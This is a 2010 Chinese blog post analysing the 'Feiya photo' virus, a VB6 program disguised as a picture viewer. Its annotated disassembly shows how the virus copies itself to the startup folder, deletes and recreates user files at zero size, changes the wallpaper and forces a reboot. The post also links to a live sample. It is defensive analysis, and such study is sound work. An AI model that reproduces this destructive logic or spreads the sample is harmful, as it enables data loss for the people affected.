“妃雅照片”病毒的简单分析

上面的图片是中毒之后的效果,关键部位已经隐藏鸟。不过要是想看高清图片的话可以猛击此处下载病毒样本测试(虚拟机下运行哦,出了问题别找我。hoho smile )。

上图是病区的所有文件信息,不要运行那个“电子找.exe”就好哈,另外提一下。那个Pic.dll文件其实是个图片,将扩展名改为jpeg就会发现这个dll文件就是病毒发作之后设置的桌面背景,如果测试病毒只想得到这个图片的话那么到这里就够鸟 😉 。

上图是病毒发作之后的另外一个症状,所有文件的大小变为0。不过很不幸的告诉大家,这个病毒直接将源文件删除,并没有进行隐藏。所以只能很悲剧哦的高速中毒的同志们,数据没鸟。如果运气好的话可以用易我数据回复向导(我记得本站有个下载链接的,自己搜索吧)或者其他的数据恢复软件尝试下恢复数据,但是成功的概率貌似很小,很小。如果只想知道自己的数据是怎么没的,还能不能找回来。那么看到这里就行了,如果想要更近一步的解释可以继续看 laugh 。另外说一下,如果硬盘分区的盘符在光驱之后则文件不会被修改,例如光驱盘符为D,则D盘之后的文件将不会被删除(系统盘文件不受影响)。

上图是病毒运行界面,其实mm长得还是挺漂亮滴。病毒在运行过程中是不会发作滴,但是一旦点了界面上的“关”那个按钮,那就真的挫啦。如果不小心运行了,可以使用任务管理器将其结束掉。并且运行完之后再次运行将会直接出现关机对话框。反正是挺恶心滴 😎 。

虽然病毒提示关机,但是你会发现中招之后的第一次并不能关闭计算机,嘎嘎。中招之后那个电子书在运行就直接提示关机啦,不能看鸟。郁郁了吧?其实要删除病毒也挺简单的,该病毒只有一个可执行文件,中毒之后可以从当前用户的启动文件夹下找到,直接用第三方进程管理工具将其结束掉并且删除即可,但是很不幸,文件驾鹤西游鸟,回不来啦。 :8
最后到了代码时间鸟,先看第一部分,程序是怎么知道有木有中毒的呢?判断比较简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
00463E60    55              push ebp                                 ; 运行次数判断,看是不是第一次,貌似第一次都好重要啊。
00463E61    8BEC            mov ebp,esp
00463E63    83EC 18         sub esp,0x18
00463E66    68 46144000     push <jmp .&MSVBVM60.__vbaExceptHandler>
00463EDB    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00463EE2    FF15 58104000   call dword ptr ds:[< &MSVBVM60.#598>]     ; MSVBVM60.rtcDoEvents
00463EE8    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5
00463EEF    C745 AC 0C27460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "WinDir"
00463EF6    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463EFD    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F00    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F03    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F09    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F0C    50              push eax
00463F0D    FF15 40104000   call dword ptr ds:[< &MSVBVM60.#667>]     ; MSVBVM60.rtcEnvironBstr
00463F13    8BD0            mov edx,eax
00463F15    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F18    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F1E    50              push eax
00463F1F    68 20274600     push 电子照.00462720                     ; UNICODE "\system32\taskmgr.exe"
00463F24    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00463F2A    8BD0            mov edx,eax
00463F2C    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F2F    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F35    50              push eax
00463F36    6A 01           push 0x1
00463F38    6A FF           push -0x1
00463F3A    6A 20           push 0x20
00463F3C    FF15 B8104000   call dword ptr ds:[< &MSVBVM60.__vbaFileO>; MSVBVM60.__vbaFileOpen
00463F42    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F45    51              push ecx
00463F46    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00463F49    52              push edx
00463F4A    6A 02           push 0x2
00463F4C    FF15 D0104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStrList
00463F52    83C4 0C         add esp,0xC
00463F55    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F58    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463F5E    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00463F65    C745 AC 5027460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "C:\Pic.dll"
00463F6C    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463F73    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F76    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F79    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F7F    6A 00           push 0x0
00463F81    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F84    50              push eax
00463F85    FF15 B0104000   call dword ptr ds:[< &MSVBVM60.#645>]     ; MSVBVM60.rtcDir
00463F8B    8BD0            mov edx,eax
00463F8D    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F90    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F96    50              push eax
00463F97    68 6C274600     push 电子照.0046276C
00463F9C    FF15 6C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCm>; MSVBVM60.__vbaStrCmp
00463FA2    F7D8            neg eax
00463FA4    1BC0            sbb eax,eax
00463FA6    F7D8            neg eax
00463FA8    F7D8            neg eax
00463FAA    66:8945 84      mov word ptr ss:[ebp-0x7C],ax
00463FAE    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463FB1    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00463FB7    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463FBA    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463FC0    0FBF4D 84       movsx ecx,word ptr ss:[ebp-0x7C]
00463FC4    85C9            test ecx,ecx
00463FC6    0F84 8E010000   je 电子照.0046415A                       ; 如果找到pic.dll文件则不跳转。直接进入关机流程
00464020    BA 50274600     mov edx,电子照.00462750                  ; UNICODE "C:\Pic.dll"
00464025    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00464028    83C1 38         add ecx,0x38
0046402B    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00464031    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
00464038    6A 01           push 0x1
0046403A    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046403D    8B51 38         mov edx,dword ptr ds:[ecx+0x38]
00464040    52              push edx
00464041    8D45 CC         lea eax,dword ptr ss:[ebp-0x34]
00464044    50              push eax
00464045    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
0046404B    50              push eax
0046404C    8D4D D0         lea ecx,dword ptr ss:[ebp-0x30]
0046404F    51              push ecx
00464050    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00464056    50              push eax
00464057    6A 14           push 0x14
00464059    E8 5AE6FFFF     call 电子照.004626B8
0046405E    8945 90         mov dword ptr ss:[ebp-0x70],eax
00464061    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00464067    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
0046406A    52              push edx
0046406B    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
0046406E    83C0 38         add eax,0x38
00464071    50              push eax
00464072    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00464078    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046407B    8B55 90         mov edx,dword ptr ss:[ebp-0x70]
0046407E    8951 34         mov dword ptr ds:[ecx+0x34],edx
00464081    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00464084    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
0046408A    C745 FC 0A00000>mov dword ptr ss:[ebp-0x4],0xA           ; 调用关机代码
00464091    C745 AC 7427460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "shutdown -r -t 5"
00464098    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
0046409F    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
004640A2    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
004640A5    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
0046415A    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0 ;如果没有文件则跳转到这里 
00464161    9B              wait
00464162    68 99414600     push 电子照.00464199
00464167    EB 26           jmp short 电子照.0046418F ;删除了部分代码,太长了
</jmp>

病毒在退出过程中执行的那些见不的人的勾当,hoho:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
00467925    51              push ecx
00467926    68 34294600     push 电子照.00462934
0046792B    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467931    8BD0            mov edx,eax
00467933    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467936    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
0046793C    50              push eax
0046793D    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467943    8D55 C4         lea edx,dword ptr ss:[ebp-0x3C]          ; 将程序复制到用户的启动文件夹下
00467946    52              push edx
00467947    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]
0046794A    50              push eax
0046794B    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
 
 00467A6F    68 50274600     push 电子照.00462750                        ; UNICODE "C:\Pic.dll"
00467A74    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
00467A77    52              push edx
00467A78    68 C0294600     push 电子照.004629C0                        ; UNICODE "\Pic.dll"
00467A7D    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467A83    8BD0            mov edx,eax
00467A85    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467A88    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00467A8E    50              push eax
00467A8F    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467A95    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]          ; 复制pic.dll文件到系统盘根目录下
00467A98    50              push eax
00467A99    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
 
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                        ; GetFloder 获取文件夹
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarLa>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarSe>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                        ; Files 获取文件
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
 
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]                 ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
 
 
00464690    55              push ebp ;文件以及文件夹删除函数
00464691    8BEC            mov ebp,esp
00464693    83EC 18         sub esp,0x18
00464696    68 46144000     push <jmp .&MSVBVM60.__vbaExceptHandler>
0046469B    64:A1 00000000  mov eax,dword ptr fs:[0]
004646A1    50              push eax
004646A2    64:8925 0000000>mov dword ptr fs:[0],esp
004646A9    B8 A4040000     mov eax,0x4A4
004646AE    E8 8DCDF9FF     call </jmp><jmp .&MSVBVM60.__vbaChkstk>
004646B3    53              push ebx
004646B4    56              push esi
004646B5    57              push edi
004646B6    8965 E8         mov dword ptr ss:[ebp-0x18],esp
004646B9    C745 EC A011400>mov dword ptr ss:[ebp-0x14],电子照.004011>; /
004646C0    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
004646C7    C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
004646CE    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
004646D1    8B08            mov ecx,dword ptr ds:[eax]
004646D3    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
004646D6    52              push edx
004646D7    FF51 04         call dword ptr ds:[ecx+0x4]
004646DA    C745 FC 0100000>mov dword ptr ss:[ebp-0x4],0x1
004646E1    8B45 10         mov eax,dword ptr ss:[ebp+0x10]
004646E4    C700 00000000   mov dword ptr ds:[eax],0x0
004646EA    C745 FC 0200000>mov dword ptr ss:[ebp-0x4],0x2
004646F1    6A 00           push 0x0
004646F3    68 30284600     push 电子照.00462830                      ; (Initial CPU selection)
004646F8    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
004646FE    51              push ecx
004646FF    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464705    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]
0046470B    52              push edx
0046470C    8D85 3CFFFFFF   lea eax,dword ptr ss:[ebp-0xC4]
00464712    50              push eax
00464713    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
00464719    C745 FC 0300000>mov dword ptr ss:[ebp-0x4],0x3
00464720    8B4D 0C         mov ecx,dword ptr ss:[ebp+0xC]
00464723    898D B4FEFFFF   mov dword ptr ss:[ebp-0x14C],ecx
00464729    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464733    B8 10000000     mov eax,0x10
00464738    E8 03CDF9FF     call </jmp><jmp .&MSVBVM60.__vbaChkstk>
0046473D    8BD4            mov edx,esp
0046473F    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464745    8902            mov dword ptr ds:[edx],eax
00464747    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046474D    894A 04         mov dword ptr ds:[edx+0x4],ecx
00464750    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464756    8942 08         mov dword ptr ds:[edx+0x8],eax
00464759    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046475F    894A 0C         mov dword ptr ds:[edx+0xC],ecx
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                      ; GetFloder 获取文件夹
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                      ; Files 获取文件
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
004647A3    50              push eax
004647A4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004647AA    83C4 10         add esp,0x10
004647AD    8BD0            mov edx,eax
004647AF    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647B5    FF15 60104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarZero
004647BB    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647C1    51              push ecx
004647C2    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
004647C5    52              push edx
004647C6    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
004647CC    50              push eax
004647CD    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
004647D3    51              push ecx
004647D4    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
004647DA    52              push edx
004647DB    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
004647E1    50              push eax
004647E2    FF15 04114000   call dword ptr ds:[< &MSVBVM60.__vbaFor>; MSVBVM60.__vbaForEachVar
004647E8    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
004647EE    E9 47010000     jmp 电子照.0046493A
004647F3    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5         ; 循环删除文件
004647FA    6A FF           push -0x1
004647FC    FF15 48104000   call dword ptr ds:[< &MSVBVM60.__vbaOnE>; MSVBVM60.__vbaOnError
00464802    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00464809    8D4D 9C         lea ecx,dword ptr ss:[ebp-0x64]
0046480C    51              push ecx
0046480D    FF15 08114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrVarCopy
00464813    8BD0            mov edx,eax
00464815    8D4D BC         lea ecx,dword ptr ss:[ebp-0x44]
00464818    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrMove
0046481E    C745 FC 0700000>mov dword ptr ss:[ebp-0x4],0x7
00464825    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464828    52              push edx
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]   ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8         ; 通过rtcKillFiles直接删除文件,太狠鸟~
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
00464853    C785 9CFEFFFF 0>mov dword ptr ss:[ebp-0x164],0xB
0046485D    6A 00           push 0x0
0046485F    68 6C284600     push 电子照.0046286C                      ; Scripting.FileSystemObject
00464864    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
0046486A    51              push ecx
0046486B    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464871    B8 10000000     mov eax,0x10
00464876    E8 C5CBF9FF     call </jmp><jmp .&MSVBVM60.__vbaChkstk>
0046487B    8BD4            mov edx,esp
0046487D    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464883    8902            mov dword ptr ds:[edx],eax
00464885    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046488B    894A 04         mov dword ptr ds:[edx+0x4],ecx
0046488E    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464894    8942 08         mov dword ptr ds:[edx+0x8],eax
00464897    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046489D    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648A0    B8 10000000     mov eax,0x10
004648A5    E8 96CBF9FF     call </jmp><jmp .&MSVBVM60.__vbaChkstk>
004648AA    8BD4            mov edx,esp
004648AC    8B85 9CFEFFFF   mov eax,dword ptr ss:[ebp-0x164]
004648B2    8902            mov dword ptr ds:[edx],eax
004648B4    8B8D A0FEFFFF   mov ecx,dword ptr ss:[ebp-0x160]
004648BA    894A 04         mov dword ptr ds:[edx+0x4],ecx
004648BD    8B85 A4FEFFFF   mov eax,dword ptr ss:[ebp-0x15C]
004648C3    8942 08         mov dword ptr ds:[edx+0x8],eax
004648C6    8B8D A8FEFFFF   mov ecx,dword ptr ss:[ebp-0x158]
004648CC    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648CF    6A 02           push 0x2
004648D1    68 A4284600     push 电子照.004628A4                      ; CreateTextFile
004648D6    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]          ;将删除的文件重新创建回来
004648DC    52              push edx
004648DD    8D85 BCFEFFFF   lea eax,dword ptr ss:[ebp-0x144]
004648E3    50              push eax
004648E4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004648EA    83C4 30         add esp,0x30
004648ED    50              push eax
004648EE    8D8D 0CFFFFFF   lea ecx,dword ptr ss:[ebp-0xF4]
004648F4    51              push ecx
004648F5    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
004648FB    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
00464901    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFre>; MSVBVM60.__vbaFreeVar
00464907    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
0046490E    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464911    52              push edx
00464912    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
00464918    50              push eax
00464919    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
0046491F    51              push ecx
00464920    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
00464926    52              push edx
00464927    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
0046492D    50              push eax
0046492E    FF15 20104000   call dword ptr ds:[< &MSVBVM60.__vbaNex>; MSVBVM60.__vbaNextEachVar
00464934    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
0046493A    83BD 94FBFFFF 0>cmp dword ptr ss:[ebp-0x46C],0x0
00464941  ^ 0F85 ACFEFFFF   jnz 电子照.004647F3                       ; 循环删除文件
 
 
00467C90    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467C93    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467C99    C745 FC 0C00000>mov dword ptr ss:[ebp-0x4],0xC
00467CA0    BA 50274600     mov edx,电子照.00462750                     ; UNICODE "C:\Pic.dll"
00467CA5    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00467CA8    83C1 38         add ecx,0x38
00467CAB    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00467CB1    C745 FC 0D00000>mov dword ptr ss:[ebp-0x4],0xD
00467CB8    6A 01           push 0x1
00467CBA    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CBD    8B48 38         mov ecx,dword ptr ds:[eax+0x38]
00467CC0    51              push ecx
00467CC1    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00467CC4    52              push edx
00467CC5    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
00467CCB    50              push eax
00467CCC    8D45 D0         lea eax,dword ptr ss:[ebp-0x30]
00467CCF    50              push eax
00467CD0    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00467CD6    50              push eax
00467CD7    6A 14           push 0x14
00467CD9    E8 DAA9FFFF     call 电子照.004626B8                        ; 设置桌面背景图片
00467CDE    8985 6CFFFFFF   mov dword ptr ss:[ebp-0x94],eax
00467CE4    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00467CEA    8B4D CC         mov ecx,dword ptr ss:[ebp-0x34]
00467CED    51              push ecx
00467CEE    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
00467CF1    83C2 38         add edx,0x38
00467CF4    52              push edx
00467CF5    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00467CFB    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CFE    8B8D 6CFFFFFF   mov ecx,dword ptr ss:[ebp-0x94]
00467D04    8948 34         mov dword ptr ds:[eax+0x34],ecx
00467D07    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00467D0A    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00467D10    C745 FC 0E00000>mov dword ptr ss:[ebp-0x4],0xE
00467D17    C745 88 7427460>mov dword ptr ss:[ebp-0x78],电子照.00462774 ; UNICODE "shutdown -r -t 5"
00467D1E    C745 80 0800000>mov dword ptr ss:[ebp-0x80],0x8          ; 关闭计算机代码
00467D25    8D55 80         lea edx,dword ptr ss:[ebp-0x80]
00467D28    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D2B    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00467D31    6A 02           push 0x2
00467D33    8D55 B0         lea edx,dword ptr ss:[ebp-0x50]
00467D36    52              push edx
00467D37    FF15 80104000   call dword ptr ds:[< &MSVBVM60.#600>]     ; MSVBVM60.rtcShell
00467D3D    DD9D 64FFFFFF   fstp qword ptr ss:[ebp-0x9C]             ; 关闭计算机
00467D43    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D46    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467D4C    C745 FC 0F00000>mov dword ptr ss:[ebp-0x4],0xF
00467D53    833D 48934600 0>cmp dword ptr ds:[0x469348],0x0
00467D5A    75 1C           jnz short 电子照.00467D78
</jmp>

PS:说句废话,喜欢看黄色图片和小电影滴银要小心啦,不要得不偿失哦。

原创文章,转载请注明: 转载自 obaby@mars

本文标题: 《“妃雅照片”病毒的简单分析》

本文链接地址: http://www.h4ck.org.cn/2010/11/photo-virus-anylist/

You may also like

发表评论

电子邮件地址不会被公开。 必填项已用*标注